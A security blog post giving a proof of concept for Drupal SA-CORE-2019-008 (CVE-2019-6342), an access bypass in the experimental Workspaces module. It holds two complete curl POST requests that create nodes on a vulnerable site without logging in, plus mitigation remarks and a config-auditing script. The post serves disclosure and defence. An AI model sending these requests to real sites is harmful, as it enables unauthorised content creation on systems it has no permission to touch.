
Drupal (SA-CORE-2019-008) Workspaces Extension Access Bypass PoC

2019-07-24 23:37:30
Black
pentestit.com

EPSS: 0.004 (Low), percentile 73.5%


Last week, an advisory (SA-CORE-2019-008) addressing a Drupal access bypass vulnerability was made public. MITRE assigned CVE-2019-6342 to this critical vulnerability. This post documents the steps I took to create a PoC for SA-CORE-2019-008. The last such post on this blog was about the Apache JMeter RMI Code Execution PoC (CVE-2018-1297).

SA-CORE-2019-008

The interesting part about this vulnerability is that it affects only Drupal 8.7.4, and only when an experimental extension, Workspaces, is enabled. Why someone would enable this extension in production is a question for another discussion; Drupal also warns you before you enable it. Anyway, I installed the affected version and browsed to Manage > Extend. If you scroll down to Core (Experimental), you can see a list of experimental extensions that you can enable. A ticked checkbox next to Workspaces indicates that the extension is enabled.

I browsed the blog for any pointers, but did not find any. Then I went back into administration, checking whether this needs additional customization. Under Manage > People > Permissions, I found a set of permissions that can be granted to “anonymous user”, “authenticated user” and “administrator”. For fun, I enabled the “Bypass content entity access in own workspace” permission for the anonymous user. Here as well, Drupal warns: “Warning: Give to trusted roles only; this permission has security implications.”

This is where I could see the “Add content” link right on the home page:

[Screenshot: CVE-2019-6342]

This exposed the node creation forms at /drupal/node/add/page and /drupal/node/add/article to unauthenticated users. The only thing remaining was to capture the requests and reproduce them.

PoC for SA-CORE-2019-008 (CVE-2019-6342):

For the node/add/article endpoint:

curl -i -s -k  -X $'POST' \
    -H $'Host: VulnerableDrupalHost' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------315272807531113' -H $'Content-Length: 1470' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    --data-binary $'-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="changed"\x0d\x0a\x0d\x0a1563834120\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="title[0][value]"\x0d\x0a\x0d\x0aTest - PenTestIT\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="form_build_id"\x0d\x0a\x0d\x0aform-5jxFukFMd9qGidaTKqOWpXjslUDhyEKwm96rp-tG6Qs\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="form_id"\x0d\x0a\x0d\x0anode_article_form\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="body[0][summary]"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="body[0][value]"\x0d\x0a\x0d\x0aTest - PenTestIT\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="field_tags[target_id]"\x0d\x0a\x0d\x0aTest - PenTestIT\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="field_image[0][fids]"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="field_image[0][display]"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="revision_log[0][value]"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="advanced__active_tab"\x0d\x0a\x0d\x0aedit-revision-information\x0d\x0a-----------------------------315272807531113\x0d\x0aContent-Disposition: form-data; name="op"\x0d\x0a\x0d\x0aSave\x0d\x0a-----------------------------315272807531113--\x0d\x0a' \
    $'http://VulnerableDrupalHost/drupal/node/add/article'

For the /node/add/page/ endpoint:

curl -i -s -k  -X $'POST' \
    -H $'Host: VulnerableDrupalHost' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 306' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    --data-binary $'title%5B0%5D%5Bvalue%5D=Test+page+-+PenTestIT&changed=1563834208&form_build_id=form-BC_Rwxanp3-uWJYB7iftIqLHt2CUXj1GYa1OhSjwJbk&form_id=node_page_form&body%5B0%5D%5Bsummary%5D=&body%5B0%5D%5Bvalue%5D=Test+page+-+PenTestIT&revision_log%5B0%5D%5Bvalue%5D=&advanced__active_tab=edit-revision-information&op=Save' \
    $'http://VulnerableDrupalHost/drupal/node/add/page'

This results in: [screenshot]

Mitigate SA-CORE-2019-008 (CVE-2019-6342):

The advisory mentions that you need to upgrade to Drupal 8.7.5 to remediate this vulnerability. Interestingly, this did not fix the problem for me. I performed the update and the Workspaces extension still shows as enabled, without any ability to disable it:

[Screenshot: Drupal Workspaces extension]

I haven’t gotten to the point of being able to disable it, but I guess this is why Drupal rated this as a Critical vulnerability.
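Because the upgrade alone left the module enabled, a defender will want to verify the two preconditions of this issue independently: Workspaces enabled, and the bypass permission granted to an untrusted role. The following added example (not from the original post) audits a Drupal 8 configuration export for both; the config file names and layout are Drupal's, while the constructed sample content and the permission machine name `bypass entity access own workspace` are assumptions.

```python
import re

# Constructed sample of a Drupal 8 config export (config/sync), modelled on the
# setup the post describes: Workspaces enabled and the workspace bypass
# permission granted to the anonymous role. The machine name
# 'bypass entity access own workspace' is assumed to back the
# "Bypass content entity access in own workspace" checkbox.
SAMPLE_CONFIG = {
    "core.extension.yml": "module:\n  node: 0\n  user: 0\n  workspaces: 0\n"
                          "profile: standard\ntheme:\n  bartik: 0\n",
    "user.role.anonymous.yml": "id: anonymous\nlabel: Anonymous user\n"
                               "permissions:\n  - 'access content'\n"
                               "  - 'bypass entity access own workspace'\n",
    "user.role.authenticated.yml": "id: authenticated\npermissions:\n"
                                   "  - 'access content'\n",
}
BYPASS_PERM = "bypass entity access own workspace"  # assumed machine name
UNTRUSTED_ROLES = ("anonymous", "authenticated")


def yaml_block_items(text, key):
    """Items under a top-level `key:` block of a simple Drupal config file:
    mapping keys (`  node: 0` -> node) or list entries (`  - 'x'` -> x).
    Only the flat shapes these two config objects use are handled."""
    items, in_block = [], False
    for line in text.splitlines():
        if re.match(rf"{re.escape(key)}:\s*$", line):
            in_block = True
            continue
        if in_block:
            if not line.startswith("  "):
                break  # back at top level: block finished
            raw = line.strip()
            items.append(raw[2:].strip("'\"") if raw.startswith("- ")
                         else raw.split(":", 1)[0])
    return items


def audit(config):
    """Return findings for the conditions SA-CORE-2019-008 depends on:
    Workspaces enabled, and the bypass permission on an untrusted role."""
    findings = []
    if "workspaces" in yaml_block_items(config.get("core.extension.yml", ""), "module"):
        findings.append("workspaces module enabled")
    for role in UNTRUSTED_ROLES:
        perms = yaml_block_items(config.get(f"user.role.{role}.yml", ""), "permissions")
        if BYPASS_PERM in perms:
            findings.append(f"role '{role}' granted '{BYPASS_PERM}'")
    return findings
```

Running `audit()` over a real `drush config:export` directory (read each file into the dict) reports both findings for the setup in this post; an empty list means neither precondition is present.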

